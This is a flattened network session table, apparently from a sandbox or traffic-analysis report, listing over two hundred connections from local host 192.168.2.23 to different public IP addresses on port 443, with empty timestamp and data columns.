                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25490192.168.2.236090679.38.161.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25491192.168.2.2349256156.44.100.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25492192.168.2.2337874212.13.19.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25493192.168.2.234756859.3.27.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25494192.168.2.2360640170.217.99.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25495192.168.2.2341538221.179.201.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25496192.168.2.233498258.96.18.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25497192.168.2.2335024152.155.18.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25498192.168.2.235943850.231.242.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25499192.168.2.2347562177.73.80.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25500192.168.2.235100845.45.6.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25501192.168.2.234466242.222.78.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25502192.168.2.235116466.133.229.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25503192.168.2.235712837.242.0.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25504192.168.2.2359804216.14.174.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25505192.168.2.2357648164.103.166.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25506192.168.2.2359412205.177.150.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25507192.168.2.2345944211.90.64.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25508192.168.2.234573873.233.104.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25509192.168.2.2354258133.156.183.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25510192.168.2.2343624151.148.70.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25511192.168.2.233786870.36.209.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25512192.168.2.234109814.229.176.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25513192.168.2.2344828151.51.147.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25514192.168.2.2336350161.199.231.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25515192.168.2.233813440.180.134.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25516192.168.2.2360500174.51.195.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25517192.168.2.2344908198.21.184.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25518192.168.2.2350648202.189.162.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25519192.168.2.2348164140.26.88.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25520192.168.2.235344467.104.0.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25521192.168.2.234323471.4.186.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25522192.168.2.2359334167.157.155.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25523192.168.2.235665293.143.168.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25524192.168.2.2344066198.115.24.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25525192.168.2.2344738187.158.154.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25526192.168.2.234353046.231.138.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25527192.168.2.2359110134.169.43.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25528192.168.2.2333520141.40.224.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25529192.168.2.2345336154.24.112.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25530192.168.2.235839853.101.251.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25531192.168.2.2357738111.72.70.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25532192.168.2.2338770106.127.89.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25533192.168.2.2350668184.48.179.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25534192.168.2.2350628118.220.137.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25535192.168.2.2348908103.119.111.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25536192.168.2.234891824.75.241.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25537192.168.2.2333040204.139.133.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25538192.168.2.2357644158.19.191.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25539192.168.2.2358906143.255.246.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25540192.168.2.233913651.11.202.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25541192.168.2.2352686189.10.141.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25542192.168.2.234611093.43.90.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25543192.168.2.233699648.254.83.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25544192.168.2.2336468169.109.105.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25545192.168.2.2349172165.14.84.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25546192.168.2.234656462.69.82.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25547192.168.2.235709497.56.234.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25548192.168.2.2351078103.15.248.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25549192.168.2.2335070174.82.204.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25550192.168.2.23405545.105.237.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25551192.168.2.2356880216.161.40.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25552192.168.2.233702289.88.208.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25553192.168.2.2337942207.112.83.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25554192.168.2.235297659.45.43.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25555192.168.2.2344406162.54.42.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25556192.168.2.2346386126.29.67.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25557192.168.2.235457854.246.177.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25558192.168.2.2358694128.142.58.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25559192.168.2.2337200169.221.92.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25560192.168.2.234128432.161.86.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25561192.168.2.2337192157.41.18.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25562192.168.2.2332776110.132.78.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25563192.168.2.2341688180.49.17.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25564192.168.2.234666494.86.146.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25565192.168.2.2357622117.188.52.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25566192.168.2.2345466199.33.95.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25567192.168.2.2337380104.68.151.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25568192.168.2.2349604168.251.13.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25569192.168.2.234799452.27.35.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25570192.168.2.234384879.13.222.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25571192.168.2.2350150211.168.26.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25572192.168.2.234767264.101.112.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25573192.168.2.2343888194.165.136.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25574192.168.2.233976490.198.170.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25575192.168.2.2340870179.208.127.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25576192.168.2.2356986193.38.174.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25577192.168.2.2340990172.6.78.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25578192.168.2.2345116109.72.91.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25579192.168.2.2359882203.206.216.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25580192.168.2.2341598126.85.189.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25581192.168.2.2339984205.28.30.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25582192.168.2.2340150205.132.124.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25583192.168.2.2357610202.177.35.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25584192.168.2.233975671.146.167.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25585192.168.2.2349472196.68.233.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25586192.168.2.2335494167.58.179.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25587192.168.2.2344778168.116.110.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25588192.168.2.2348598102.241.15.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25589192.168.2.234735214.76.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25590192.168.2.2353698169.236.94.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25591192.168.2.233516269.6.229.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25592192.168.2.2340950176.223.169.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25593192.168.2.2345558140.216.157.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25594192.168.2.2346394206.183.196.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25595192.168.2.235096657.186.220.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25596192.168.2.2334184138.217.86.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25597192.168.2.2338100217.234.83.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25598192.168.2.234321887.212.61.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25599192.168.2.234235863.93.43.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25600192.168.2.235808432.69.227.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25601192.168.2.2338708180.153.6.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25602192.168.2.233452837.126.178.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25603192.168.2.23431742.219.69.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25604192.168.2.235116876.121.158.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25605192.168.2.234747471.75.171.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25606192.168.2.233480637.248.125.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25607192.168.2.235889284.214.119.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25608192.168.2.2342222182.101.173.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25609192.168.2.2345922121.202.156.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25610192.168.2.2343482114.28.38.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25611192.168.2.2334212179.244.24.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25612192.168.2.233667270.44.183.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25613192.168.2.2355328124.192.138.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25614192.168.2.235419885.88.51.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25615192.168.2.234592450.80.208.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25616192.168.2.2333400172.38.219.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25617192.168.2.2350836125.193.48.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25618192.168.2.2358820174.44.252.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25619192.168.2.235447052.206.112.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25620192.168.2.2357008132.92.86.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25621192.168.2.234911220.116.140.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25622192.168.2.2333268151.106.161.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25623192.168.2.2343730199.192.13.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25624192.168.2.234170052.253.144.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25625192.168.2.2347884110.49.123.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25626192.168.2.2342458119.251.36.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25627192.168.2.2360568145.105.196.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25628192.168.2.233346276.208.186.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25629192.168.2.2342082222.253.36.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25630192.168.2.234814494.197.83.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25631192.168.2.2343648143.229.102.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25632192.168.2.235877038.138.111.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25633192.168.2.233992868.228.126.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25634192.168.2.2357168133.100.249.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25635192.168.2.2350214163.37.79.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25636192.168.2.234281239.158.122.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25637192.168.2.2336868221.142.241.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25638192.168.2.234648670.104.219.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25639192.168.2.2351766184.238.47.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25640192.168.2.2344904122.247.55.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25641192.168.2.2355852125.203.172.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25642192.168.2.2341450189.64.225.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25643192.168.2.236048418.37.73.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25644192.168.2.233406476.25.235.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25645192.168.2.235191049.2.166.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25646192.168.2.233685634.62.108.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25647192.168.2.2336242114.38.132.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25648192.168.2.234733253.217.154.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25649192.168.2.2352908100.135.156.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25650192.168.2.2346696155.165.111.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25651192.168.2.234492064.24.77.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25652192.168.2.2355056164.177.106.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25653192.168.2.2335686220.117.180.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25654192.168.2.2337308110.9.79.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25655192.168.2.235174093.25.42.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25656192.168.2.235021265.23.89.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25657192.168.2.2334500174.75.49.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25658192.168.2.2340572136.11.60.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25659192.168.2.234777269.135.232.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25660192.168.2.235866287.190.203.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25661192.168.2.234507497.111.234.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25662192.168.2.233400244.179.224.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25663192.168.2.234378623.15.153.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25664192.168.2.2353340222.81.98.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25665192.168.2.2335778153.105.44.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25666192.168.2.2349778205.202.15.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25667192.168.2.235813647.195.9.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25668192.168.2.235906452.103.114.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25669192.168.2.2357182142.95.29.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25670192.168.2.2334292174.26.202.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25671192.168.2.2355136103.120.100.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25672192.168.2.2352278187.245.208.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25673192.168.2.2352860157.200.201.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25674192.168.2.233970834.251.231.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25675192.168.2.235407020.153.66.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25676192.168.2.2350660193.127.183.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25677192.168.2.2354148151.97.236.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25678192.168.2.2359836161.212.236.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25679192.168.2.2349698105.115.51.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25680192.168.2.2356920126.43.128.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25681192.168.2.234397834.167.178.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25682192.168.2.235003499.234.26.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25683192.168.2.235400683.229.24.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25684192.168.2.2356288171.7.124.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25685192.168.2.235625425.201.68.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25686192.168.2.233836472.179.183.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25687192.168.2.233416486.138.235.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25688192.168.2.2348406101.97.180.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25689192.168.2.234133671.97.237.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25690192.168.2.234840457.140.189.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25691192.168.2.2339682128.225.8.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25692192.168.2.2341602151.179.180.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25693192.168.2.2355650218.81.108.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25694192.168.2.235583019.142.174.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25695192.168.2.2341470123.248.254.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25696192.168.2.234017638.57.141.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25697192.168.2.234453468.186.157.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25698192.168.2.2343244167.209.174.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25699192.168.2.2339690104.42.194.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25700192.168.2.2356562184.94.77.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25701192.168.2.23482688.54.150.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25702192.168.2.2343642177.195.193.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25703192.168.2.23547684.65.143.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25704192.168.2.235851698.76.51.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25705192.168.2.235467079.164.195.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25706192.168.2.2344822140.219.80.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25707192.168.2.234570041.209.51.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25708192.168.2.235086290.18.180.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25709192.168.2.2356590178.239.106.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25710192.168.2.2347128109.68.187.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
